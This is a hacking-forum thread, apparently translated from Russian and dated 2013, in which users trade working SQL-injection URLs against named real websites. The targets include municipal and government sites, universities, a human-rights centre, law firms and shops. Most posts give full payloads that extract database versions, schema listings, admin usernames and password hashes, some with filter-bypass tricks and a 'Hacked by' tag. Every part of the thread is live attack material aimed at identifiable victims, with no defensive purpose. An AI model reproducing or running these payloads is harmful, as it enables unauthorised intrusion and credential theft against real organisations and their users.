http://www.teklat.lv/c.php?id=2&id2=75%27+union+select+1,2,3,4,5,%28select%28@x%29 from%28select%28@x:=0x00%29,%28select%28null%29fro m%28information_schema.columns%29where%28table_sch ema!=0x696e666f726d6174696f6e5f736368656d61%29and% 280x00%29in%28@x:=concat%28@x,0x3c62723e,table_sch ema,0x2e,table_name,0x3a,column_name%29%29%29%29x% 29,7,8,9,10+--+
Code:
http://www.dfki.de/lt/card.php?id=-94+union+select+1,version%28%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,1,61,7,18,19,20,21,22,23,24,25,26,27 ,28,29+--+
Version: 4.0.21-Max
Code:
http://www.biprint.ru/index.php?area=soft&parent=-39+union+select+version%28%29+--+
Version: 5.1.56-log (there is a filter on database output)
Code:
http://www.bionets.eu/index.php?area=-17+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28bionets.u sers%29where%280x00%29in%28@x:=concat%28@x,0x3c627 23e,username,0x3a,passwd%29%29%29%29x%29+--+
FC Khimki
Code:
http://www.fckhimki.ru/modules/content/index.php?current_id=-49+union+select+1,2,3,4,5,6,7,8,%28select%28@x%29f rom%28select%28@x:=0x00%29,%28select%28null%29from %28information_schema.columns%29where%28table_sche ma!=0x696e666f726d6174696f6e5f736368656d61%29and%2 80x00%29in%28@x:=concat%28@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name%29%29%29%29x%2 9,10,11,12,13+--+
ROSHYDROMET
Code:
http://caspianmonitoring.ru/index.php?id=-1+union+select+1,%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8+--+
5.0.96-community
Code:
http://www.violinlab.com/FAQ/index.php?id=1+/*!union*/+/*!select*/+1,2,version%28%29,4+--+
4.0.27-log
Code:
http://www.obruch.ru/index.php?id=8&n=77&r=6+union+select+1,2,3,4,version%28%29+--+
Code:
http://www.africasia.com/services/opinions/opinions.php?ID=-2822%20union%20select%201,2,concat_ws(0x3a,version (),user(),database(),0x4861636b6564206279205365706 f),4,5,6,7,8,9,10--
Code:
http://www.sourceisrael.com/read.php?id=-104+union+select+1,group_concat(concat_ws(0x3a,ver sion(),user(),database(),0x4861636b656420627920536 5706f)),3,4,5,6,7,8,9,10,11+--+
Code:
http://www.lapedale.fr/pages/produit.php?id=-1133+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,concat_ ws(0x3a,version(),user(),database(),0x4861636b6564 206279205365706f),12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51--
Code:
http://www.wf-baits[dot]com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&cmd=add&cid=20&sid=0.6886686905513422&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5 ,6,7,8,CONCAT_ws(CHAR(32,58,32),user(),version(),d atabase()),10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63%23
Tyc 610 Pr 1
Unknowhacker
06.09.2013, 00:35
PrivatBank Auto
Code:
http://privat-auto.info/index.php?region=-1+union+select+%28select%28@x%29from%28select%28@x :=0x00%29,%28select%28null%29from%28information_sc hema.columns%29where%28table_schema!=0x696e666f726 d6174696f6e5f736368656d61%29and%280x00%29in%28@x:= concat%28@x,0x3c62723e,table_schema,0x2e,table_nam e,0x3a,column_name%29%29%29%29x%29+--+
See line 7 of the page source.
Pyramid CAr
Code:
http://www.pyravastuconsultant.in/pyramid-car.php?id=1+union+select+1,2,3,4,5,6,%28select%28 @x%29from%28select%28@x:=0x00%29,%28select%28null% 29from%28pyravast_pyravast.user_m%29where%280x00%2 9in%28@x:=concat%28@x,0x3c62723e,user_name,0x3a,pa ssword%29%29%29%29x%29+--+
Car rental
Code:
http://www.elitetrans.com.ua/car.php?show=category&id=-6+union+select+1,2,3,4,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%28null%29from%28inform ation_schema.columns%29where%28table_schema!=0x696 e666f726d6174696f6e5f736368656d61%29and%280x00%29i n%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,t able_name,0x3a,column_name%29%29%29%29x%29,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20+--+
Greek Catholics
Code:
http://www.mgce.uz.ua/category.php?id=14+union+/*!select*/+1,%28select%28@x%29from%28select%28@x:=0x00%29,%2 8select%28null%29from%28information_schema.columns %29where%28table_schema!=0x696e666f726d6174696f6e5 f736368656d61%29and%280x00%29in%28@x:=concat%28@x, 0x3c62723e,table_schema,0x2e,table_name,0x3a,colum n_name%29%29%29%29x%29,3+--+
Yuvelirservis
Code:
http://www.js.dn.ua/item.php?id=6&ref_item=133%27and%28select*from%28select%28name_c onst%28version%28%29,1%29%29,name_const%28version% 28%29,1%29%29a%29and%27/
5.1.61
=========================================
ELKOPLAST
Code:
http://elkoplast.ua/pro.php?id=30%27and%28select*from%28select%28name_ const%28version%28%29,1%29%29,name_const%28version %28%29,1%29%29a%29and%27
Version: 5.5.31
BukVitsa
Code:
http://www.bookvica.com.ua/shop.php?id=300+union+select+1,%28select%28@x%29fr om%28select%28@x:=0x00%29,%28select%28null%29from% 28bookvica_bookvica.users%29where%280x00%29in%28@x :=concat%28@x,0x3c62723e,login,0x3a,pass%29%29%29% 29x%29,3,4,5,6,7,8,9,10,11,12,13+--+
http://
www.planetfengshui.in
/love.php?id=9&cat_id=9+and+1=2+union+select+1,concat(unhex(hex(u ser())),0x3a,unhex(hex(database())),0x3a,unhex(hex (version()))),3,4,5,6 --+
===========================================
http://
www.accu-split.com
/event-details.html?id=-31'+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13 --+
===========================================
Unknowhacker
06.09.2013, 21:11
Comedy Club Kuban STYLE - how I hate them, to be honest!
Code:
http://comedykuban.ru/news.php?news_id=-17%27+union+select+1,0x472e4d61727469726f7379616e2 02d20332c313464617220436f204c74642e,3,4+--+
Version: 5.5.30-30.2-log
=============================================
TekhnoSektor online store
Code:
http://www.tes-ua.com/catalog.php?cat_id=29&brend=-180%29+union+select+1,2,3,4,5,6,7,8,%28select%28@x %29from%28select%28@x:=0x00%29,%28select%28null%29 from%28information_schema.columns%29where%28table_ schema!=0x696e666f726d6174696f6e5f736368656d61%29a nd%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_ schema,0x2e,table_name,0x3a,column_name%29%29%29%2 9x%29+--+
Code:
http://www.mtosmt.org/mto-announce.php?id=-120+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,0x4861636b6564206279205365706f,5--
Code:
http://www.nau.in/announce.php?id=-595+union+select+1,0x4861636b6564206279205365706f, concat_ws(0x3a,version(),user(),database()),4,5,6, 7,8,9,10--
Code:
http://www.bjp-bg.com/paper.php?id=-5%20union%20select%201,2,3,4,@@version,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37--
Unknowhacker
08.09.2013, 11:22
Photographer Andre Arment
Code:
http://www.andrearment.com/cat.php?id=-3'+union+select+1,2,3,(select(@x)from(select(@x:=0 x00),(select(null)from(andrearm_db.members)where(0 x00)in(@x:=concat(@x,0x3c62723e,username,0x3a,pass word%29%29%29%29x%29,5+--+
NOTE: See the page source, line 67.
===============================================
Audio-video showroom Триумфальная Арка
Code:
http://www.arka-hitech.com.ua/cat.php?id=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18+--+
4.1.25-log
===============================================
Official website of Kharkov
Code:
http://www.kharkov.ua/internet.php3?categ=-25+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28khadm.cli ents%29where%280x00%29in%28@x:=concat%28@x,0x3c627 23e,email,0x3a,clientusername,0x3a,clientpassword% 29%29%29%29x%29,4,5,6,7,8+--+
BrilliantStudents.com
Code:
www.brilliantstudent.in/games.php?id=-2+union+/*!select*/+1,2,/*!table_name*/,4,5,6,7+/*!from*/+/*!information_schema.tables*/+/*!limit*/+4,20+--+
Note: I could not output data from the bs-admin table
Dracodes - GAMES, or a "coarse cleaning" filter.
Code:
http://www.dracoders.com/games.php?id=-7+/*!union*/+select+1,2,3,4,%28select%28@x%29from%28select%28@ x:=0x00%29,%28select%28null%29from%28Sql286973_1.j os_users%29where%280x00%29in%28@x:=concat%28@x,0x3 c62723e,username,0x3a,password%29%29%29%29x%29+--+
Marim.IT
Code:
http://www.marim.it/games.php?id=494%20and%20%281,1%29%3E%28select%20c ount%28*%29,concat%28%28select%20version%28%29%20% 29,0x3a,floor%28rand%28%29*2%29%29%20x%20from%20%2 8select%201%20union%20select%202%29%20a%20group%20 by%20x%20limit%201%29%23
Version: 5.0.51a-24+lenny4:0
AutoDiv
Code:
http://autodiv.rs/auto.php?id=1187%27+union+select+1,2,3,version%28% 29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27+--+
Version: 5.1.53
JobMan.Ru
Code:
http://www.jobman.ru/html/doc.php?id=30+union+select+1,2,3,%28select%28@x%29 from%28select%28@x:=0x00%29,%28select%28null%29fro m%28information_schema.columns%29where%28table_sch ema!=0x696e666f726d6174696f6e5f736368656d61%29and% 280x00%29in%28@x:=concat%28@x,0x3c62723e,table_sch ema,0x2e,table_name,0x3a,column_name%29%29%29%29x% 29+--+
Novikovi.info
Code:
http://novikovi.info/man.php?id=-73+union+select+%28select%28@x%29from%28select%28@ x:=0x00%29,%28select%28null%29from%28information_s chema.columns%29where%28table_schema!=0x696e666f72 6d6174696f6e5f736368656d61%29and%280x00%29in%28@x: =concat%28@x,0x3c62723e,table_schema,0x2e,table_na me,0x3a,column_name%29%29%29%29x%29,2,3,4,5+--+
ЛАСМЕТ - Laboratory of Special Metallurgy!
Code:
http://www.lasmet.ru/steel/mark.php?s=-50+union+select+1,%28select%28@x%29from%28select%2 8@x:=0x00%29,%28select%28null%29from%28lasmet18_db 2.admin%29where%280x00%29in%28@x:=concat%28@x,0x3c 62723e,login,0x3a,passwd%29%29%29%29x%29,3,4,5,6,7 ,8,9,10,11,12,13,14,15+--+
:: fmaurer ::
Code:
http://www.fmaurer.com/index.php?category_id=-5+union+select+1,2,3,4,5,6,7,version%28%29,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
Version: 5.0.51a-24+lenny5
Axesstel routers
Code:
http://www.axesstel.com/index.php?section=product&subsection=product_category&category_id=15+aND+1=0+UNION+SELECT+1,2,VERSION%28 %29,4,5,6,7,8,9,10+--+
Version: 4.1.22-standard-log
ЭКОМ - Public discussion of urban development projects
Code:
http://ecom.su/city_building/index.php?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,%28s elect%28@x%29from%28select%28@x:=0x00%29,%28select %28null%29from%28information_schema.columns%29wher e%28table_schema!=0x696e666f726d6174696f6e5f736368 656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c627 23e,table_schema,0x2e,table_name,0x3a,column_name% 29%29%29%29x%29,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35+--+
P.S. Don't forget to remove the spaces!
Code:
http://www.sostrader.it/sostrader/didattica1.cfm?id=2+and+1=0+union+all+select+1,2,@ @version/*
UP
http://
www.remassociates.co.uk
/jobs.php?id=34'+union+select+1,@@version,3,4,5,6,7 ,8,9,10,11,12,13+--+
===============================================
pr=1
http://
www.torson.be
/jobs.php?id=8+and +1=2+union+select+1,2,version(),4+--+
===============================================
pr=3
http://
careers.cngroup.co.uk
/job.php?id=6'+and+(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
===============================================
pr=3
http://
www.navagaprom.com
/oldsite/job.php?id=-96+union+select+1,version(),3,4+--+&db=job
===============================================
http://
www.cornerjob.co.za
/view-job.php?id=678 and if(mid(version(),1,1)=5,sleep(5),0)
===============================================
pr=6
http://
www.niot.res.in
/recruit/cv/job.php?id=-106+union+select+concat_ws(0x3a,user,password,file _priv),2,3 from mysql.user+--+
===============================================
pr=3
http://
www.tedrecruitment.com
/job.php?id=8263'+and+row(1,1)>(select+count(*),concat((select +table_name from information_schema.tables where table_schema=database() limit 11,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x ) and '1'='1
===============================================
TIC = 300
http://
www.artantique.ru/brand-item.phtml?id=15+union+select+1,concat_ws(':',user (),version(),database()),3,4,5,6+--+
File_priv = Y
Code:
http://www.toddjobs.com/job.php?ID=-97+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database(),0x4861636b6564206279205365706f) ,7,8,9,10,11,12,13,14--
pr=3
http://
www.hassalls.com.au
/auction.php?id=405+and(select 1 from(select count(*),concat((select concat(username,0x3a,password) from cmsc_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
===============================================
country.ua
14k traffic
http://www.country.ua/message_send.php?to_user=4726/**/union/**/select/**/concat_ws(':',user(),version(),database()),2/**/--+
PS you need to log in
PSS no idea where the admin panel is)
ej.ru
PHP:
http://ej.ru/articles/?a=24&id=17+or+1+group+by+concat%28%28select+version%28% 29%29,0x00,floor%28rand%280%29*2%29%29having+min%2 80%29+or+1--+
CY:4700||PR:5
25k traffic, there are passwords in the DB, no idea where the admin panel is))
TIC 190
http://www.kino-ukraina.com.ua/showwait.php?wait_id=271+union+select+1,2,user(),v ersion()+--+
root@localhost
http://
www.distrilog.be
/pages/en/jobs.php?dis=detail&ID=-43'+union+select+1,2,3,concat_ws(0x3a,username,pas sword),5,6,7,8,9 from users limit 0,1+--+
===============================================
http://murtet.ru/index.php?page=-norders'+union+select+version()+--+
http://
www.poniem.co.uk
/products/model.php?id=-14+union+select+1,2,version(),4,5,6,7,8,9 +--+
===============================================
http://
www.hiredhandsmodels.com
/model.php?id=24+and+(substring(version(),1,1)=4)+--+
===============================================
psihoz26
23.09.2013, 17:24
Code:
http://addcs.vpn.by/view.php?bg=3C3A36&text=9a9a9a&link=ffffff&ip=ffffff&m=1&id=-800+union+select+1,2,3,4,admin_name,admin_pass,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20+from+csmon.amx _admin+limit+0,1+--+
for some reason it doesn't load with the word concat in the query
Havij and sqlmap won't dump
had to work it by hand =(
Unknowhacker
24.09.2013, 12:26
Big Криуз (filter on data output)
Code:
http://www.bigcruise.ru/company/?id=-40%27+union+select+1,2,version(),4,5,6+--+
Version: 5.1.70-log
Строймат
Code:
http://www.stroymat.net/index.php?sectID=-6+union+select+1,2,3,%28select%28@x%29from%28selec t%28@x:=0x00%29,%28select%28null%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29,5,6,7,8+--+
Lumber store (has many databases)
Code:
http://wood-group.ru/index.php?sectID=-179+union+select+1,2,3,4,5,6,7,%28select%28@x%29fr om%28select%28@x:=0x00%29,%28select%28null%29from% 28information_schema.columns%29where%28table_schem a!=0x696e666f726d6174696f6e5f736368656d61%29and%28 0x00%29in%28@x:=concat%28@x,0x3c62723e,table_schem a,0x2e,table_name,0x3a,column_name%29%29%29%29x%29 ,9+--+
OPMPlus Moscow
Code:
http://www.opmplus.ru/index.php?gID=-165+union+select+1,2,3,4,version%28%29,6,7,8,9+--+§ID=6
Version: 5.1.52-log
DD2DDS (I can't bypass the filter)
Code:
http://www.dds2dds.com/index.php?sect_id=12&site_num=1%27+union+select+1,2,3,4,5+--+
SALE.KHARKOV.UA
Code:
http://www.sale.kharkov.ua/advinfo.php?postid=146+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,version%28%29 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
Version: 5.0.91-log (I won't be able to pull the database because of filtering)
БЛОК-ХАУС
Code:
http://www.blok-haus.ru/index.php?sectID=-1+union+select+1,version%28%29+--+
Version: 5.1.52-log
Administration of Yeysk District
Code:
http://rayon.yeisk.su/trades/index.php?p_id=-466+union+select+1,2,3,4,%28select%28@x%29from%28s elect%28@x:=0x00%29,%28select%28null%29from%28info rmation_schema.columns%29where%28table_schema!=0x6 96e666f726d6174696f6e5f736368656d61%29and%280x00%2 9in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e ,table_name,0x3a,column_name%29%29%29%29x%29,6,7+--+
Lion-Expo.Ru
Code:
http://lion-expo.ru/index.php?sectID=781+union+select+1,version%28%29, 3,4,5,6,7,8+--+
Version: 5.5.33-cll-lve
OAO "Стеклозавод" "НЕМАН", or how to break all the glass.
Code:
http://www.neman.by/ru/index.php?section_id=-125+union+select+%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29+--+
Unknowhacker said:
Big Криуз (filter on data output)
Code:
http://www.bigcruise.ru/company/?id=-40%27+union+select+1,2,version(),4,5,6+--+
Version:
5.1.70-log
The filter is not "on data output"; the filter is on from. That is, FROM, fRoM, etc. are not filtered.
www.bigcruise.ru/company/?id=-40'+union select+1,2,table_name,4,5,6+FROM+information_schem a.tables+where table_schema=database()+limit 0,1+--+
and here is the first table: admins
Unknowhacker
25.09.2013, 18:45
Code:
http://www.kenwright.com/index.php?id=-1265+union+select+1,2,version%28%29,4,5,6,7,8,9,10 +--+
Version: 5.0.95-log
Wri GROUP
Code:
http://wrigroup.ca/index.php?catid=-148+union+select+%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28wrigroup_wri group.cfaq_admin%29where%280x00%29in%28@x:=concat% 28@x,0x3c62723e,username,0x3a,password%29%29%29%29 x%29,2+--+
===============================
Steam Whistle Brewing
Code:
https://shop.steamwhistle.ca/index.php?CatID=25+union+/*!select*/+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14+--+
Version: 5.0.96-community
===============================
Code:
http://www.thecis.ca/index.php?catID=40&itemID=-63+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28cistudies .cisUsers%29where%280x00%29in%28@x:=concat%28@x,0x 3c62723e,userName,0x3a,userPasswd%29%29%29%29x%29, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23+--+
See the title or the page source, line 6
===============================
Code:
http://dogbg.net/index.php?catid=-18+union+/*!select*/+1,version%28%29+--+
Version: 5.1.70-cll
==============================
HevyMetal.com, fans of heavy music, all come here
Code:
https://www.heavymetal.com/index.php?id=-1946+union+/*!select*/+1,2,3,4,5,6,version%28%29,8,9,10,11,12+--+
Version: 5.0.96-community
=========================
эКОМ
Code:
http://ecom.su/news/index.php?id=-1232+union+select+1,2,3,4,5,6,7,%28select%28@x%29f rom%28select%28@x:=0x00%29,%28select%28null%29from %28information_schema.columns%29where%28table_sche ma!=0x696e666f726d6174696f6e5f736368656d61%29and%2 80x00%29in%28@x:=concat%28@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name%29%29%29%29x%2 9,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35+--+
Legal aid, Moscow Bar Association
Code:
http://www.trunov.com/content.php?act=showcat&id=-357+union+select+%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29,2+--+
see TITLE
УКР Пром
http://www.ukr-prom.com/firm-100+and+1>(ORD(substr(database(),1,1))<>0x7A)/
@@basedir - 5: /usr/
user() - 14: zmey@localhost
database() - 16: zmey_ukrprom_new
version() - 10: 5.0.77-log
Unknowhacker
26.09.2013, 19:39
Legal Aid Center
Code:
http://arbitrsud.com/index.php?mat=-12+union+select+1,2,3,version%28%29,5,6,7,8,9,10,1 1,12+--+
Version: 5.1.70-log BLIND
The filter lets FrOm through
http://www.wtech.ru/images/logo.gif
http://www.wtech.ru/?page=market&razd=-5%20and%201=2%20union%20select%201,concat_ws(0x3a, @@version,user(),database()),3,4,5--
5.1.68-cll wtech_wtech@localhost wtech_vt
DezMond™
28.09.2013, 12:45
https://koki-es.de/shop_index.php?action=progr_detail¶m=detail&id=-680+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43+--+
Unknowhacker
28.09.2013, 19:09
Ural Auto Auction
Code:
http://www.uralaa.ru/moto.php?id=-317%27+union+select+1,2,3,4,5,6,7,version%28%29,9, user%28%29,database%28%29,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42+--+
Version: 5.0.96-community
User: uralaa_uralaa@localhost
DB: uralaa_uralaaru
Mistoveloce.It, Italian sport motorcycle site
Code:
http://mistoveloce.it/moto.php?id=488%27+union+select+1,%28select%28@x%2 9from%28select%28@x:=0x00%29,%28select%28null%29fr om%28mistodb.users%29where%280x00%29in%28@x:=conca t%28@x,0x3c62723e,username,0x3a,password%29%29%29% 29x%29,3,4,5,6,7,8,9,10,11,12+--+
Italian scooters, mopeds
Code:
http://www.autoexclusive.it/fra/moto.php?id=-23+union+select+1,2,3,4,5,6,7,version%28%29,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29+--+
Version: 5.0.92-enterprise-gpl-log (There is a filter on data output)
Code:
Cuir JB | Moto
http://www.cuir-mode-jb.com/moto.php?id=2+order+by+7+--+
JPLand
Code:
http://jpland.ru/mototehnika.php?id=160%27+UNION+SELECT+user%28%29, 2,3,4,version%28%29,6,7,8,9,10+--+
Version: 4.1.22-log
Honda Aphla (Honda motorcycles) official site
Code:
http://www.hondaalpina.com.br/moto.php?id=3911/**//*!uNiOn*//**//*!SELECT*/1/*!,*/2/*!,*/version%28%29/*!,*/4/*!,*/5/*!,*/6/*!,*/7/*!,*/8/*!,*/9/*!,*/10/*!,*/11/*!,*/12/*!,*/13/*!,*/14/*!,*/15/*!,*/16/*!,*/17/*!,*/18/*!,*/19/*!,*/20/*!,*/21/*!,*/22+--+
Version: 5.1.70-cll
BLurpi^_^
29.09.2013, 08:19
http://profmagazin.ru/index.php?cPath=274+UNION+SELECT+version%28%29,2+--+
output is on the right, in the cart
Code:
http://www.futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,10,11--
Code:
олимп-омск.рф/catalog.php?cid=-47+union+select+1,version(),3,4,5,6,7,8,9,10,11,us er(),database()+--+
www.kinoteatrdoc.ru/press.php?id=-59+union+select+user(),databas(),version()+--+
sedimental.com/catalog/index.php?ID=-59'+UNION+SELECT+1,database(),user(),version(),5,6 ,7,8,9,10,11,12,13,14,15,16,17+--+
www.krasarossii.ru/blocks/2012-kr.php?id=-59+union+select+1,55,user(),4,database(),6,version (),8,9+--+
WallHack
30.09.2013, 12:46
Active advertising system!
http://novabux.ru/news.php?id=0%27+union+select+1,group_concat(0x03a ,column_name),3,4+from+information_schema.columns+ where+table_name=0x74625F7573657273+--+
And the Philosophical Anthropology site
http://encycl.anthropology.ru/article.php/?id=1+union+select+1,@@version,3,4,5,6,7,8,9,10+--
http://
www.intelpre.com
/site/album/ds.php?id=3
'+union -- %0A%0Dselect*fRom(select 1)a1 join(select 2)a2 join(select version())a3 join(select 4)a4 join(select 5)a5 join(select 6)a6+--+
==============================================
Улыбайся
01.10.2013, 00:05
Deputy of the Council of Deputies of the Orenburgsky District municipality
http://vakalinin.ru/index.php?name=news&id=-23%27+union+select+1,2,database%28%29,@@version,5, 6,7+--+
ADMINISTRATION OF THE MUNICIPALITY
PRIGORODNY VILLAGE COUNCIL, ORENBURGSKY DISTRICT, ORENBURG OBLAST
Code:
http://moprigorod.ru/news.php?id=-49'+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5+--+
Unknowhacker
01.10.2013, 19:20
American Society of International Law
Code:
http://www.eisil.org/index.php?t=sub_pages&cat=-185+union+Select+1,2,3,4,version%28%29,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21+--+
Version: 5.0.77
Note: When data output is requested, the browser hangs.
===========================================
Mo-Ranch Conference Center
Code:
http://www.moranch.com/index.php?t=-6+union+select+%28select%28@x%29from%28select%28@x :=0x00%29,%28select%28null%29from%28information_sc hema.columns%29where%28table_schema!=0x696e666f726 d6174696f6e5f736368656d61%29and%280x00%29in%28@x:= concat%28@x,0x3c62723e,table_schema,0x2e,table_nam e,0x3a,column_name%29%29%29%29x%29+--+
EDU
Code:
http://www.mes.edu.eg/newsletter_archive.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),0x4861636b6564206279205365706f,4,5--
Unknowhacker
02.10.2013, 16:15
European Center for the Protection of Human Rights
Code:
http://ehracmos.memo.ru/page.php?page=-14%27+union+select+1,2,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%28null%29from%28u36634 4.writers%29where%280x00%29in%28@x:=concat%28@x,0x 3c62723e,username,0x3a,password%29%29%29%29x%29,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34+--+
NOTE: The whole truth is here -)
Code:
http://azembassy.pl/pl/index.php?section=-11+/**/union/**/+/**/select/**/+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),d atabase()),10,11,12,13,14+--+
Code:
5.5.33:azembassy_hotcom@hotcom.pl:azembassy_hotcom
http://
www2.mikipulley.co.jp
/en/product/model.php?id=pcbts&code=-001'+union+select+1,2,3,version(),5+--+
==============================================
pr=4
http://
www.ccmht.org
/dev/auction.php?id=1+union+select+version(),2,3,4,5,6, 7,8,9,10,11,12,13,14+--+
==============================================
http://
www.webandy.hekko.pl
/shimano/model.php?id=765+union+select+version(),2,3,4,5,6, 7,8,9+--+
==============================================
http://
www.dropdeadglamour.co.uk
/model.php?id=33+and+row(1,1)>(select+count(*),concat((select +version()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x )
==============================================
TIC=10 pr=5
http://
www.ecam.es
/formacion/master.php?id=53'+union+select+1,2,3,(select(@x)fr om(select (@x:=0x00),(select(0)from(db1373047_ecam.profesora do)where(0x00)in(@x:=concat(@x,0x3c62723e,0x3a,usu ario,0x3a,pass))))antichat),5,6,7,8,9,10,11,12,13, 14,15,16,17+--+
==============================================
pr=4
http://
www.iundia.es
/iundia-master/master.php?id=2+and+1=2+/*!union*/+select+1,2,3,(select(@x)from(select (@x:=0x00),(select(0)from(qhb674.cms_administrador es)where(0x00)in(@x:=concat(@x,0x3c62723e,usr_admi n,0x3a,clave_admin))))antichat)+--+
==============================================
pr=7
http://
www.placement-uk.com
/ops/job.php?id=-1188'+union+select+1,2,concat(user,0x3a,pass),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31 from admin limit 0,1+--+
==============================================
Syrian Customs Service
Code:
http://www.customs.gov.sy/Tariff.php?sid=-01+union+selecT+1,2,3,concat_ws(0x3a,version(),use r(),database(),0x4861636b6564206279205365706f),5,6 ,7--
novostivl.ru
PHP:
http://novostivl.ru/chat/view.php?id=3+or+1+group+by+concat((select+0x76657 273696f6e73716c),0x00,floor(rand(0)*2))having+min( 0)+or+1--+
db 5 version
CY:2300||PR:5
==================================================
Unknowhacker
04.10.2013, 18:59
Football League
Code:
http://pfl.ua/articles/?rart=1275979382+order+by+2+--+
mid-day.com
http://www.mid-day.com/anniversary/maximum-city/article.php?id=43-999.9+union+select+1,2,3,4,5,6,7,8--
PR 3
TIC 80
Alexa 6k
Code:
http://www.carhs.de/en/training/seminar_functions.php?sem_code=-2045'+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26--+
Unknowhacker
10.10.2013, 12:31
Help for Seafarers
Code:
http://crew-help.com.ua/study_out.php?id=-4+union+select+1,2,3,%28select%28@x%29from%28selec t%28@x:=0x00%29,%28select%28null%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29+--+
Note: A phpBB forum as a bonus!
Department of Physics, Siberian State Geodetic Academy
Code:
http://physics-ssga.ru/news.php?id=-2+union+select+1,%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29,3,4,5+--+
Telecommunications company OOO "МЁБИУС Телеком"
Code:
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16+--+
Note: Work it however you like, but I didn't find anything!
СПОРТ ТРЕЙД
Code:
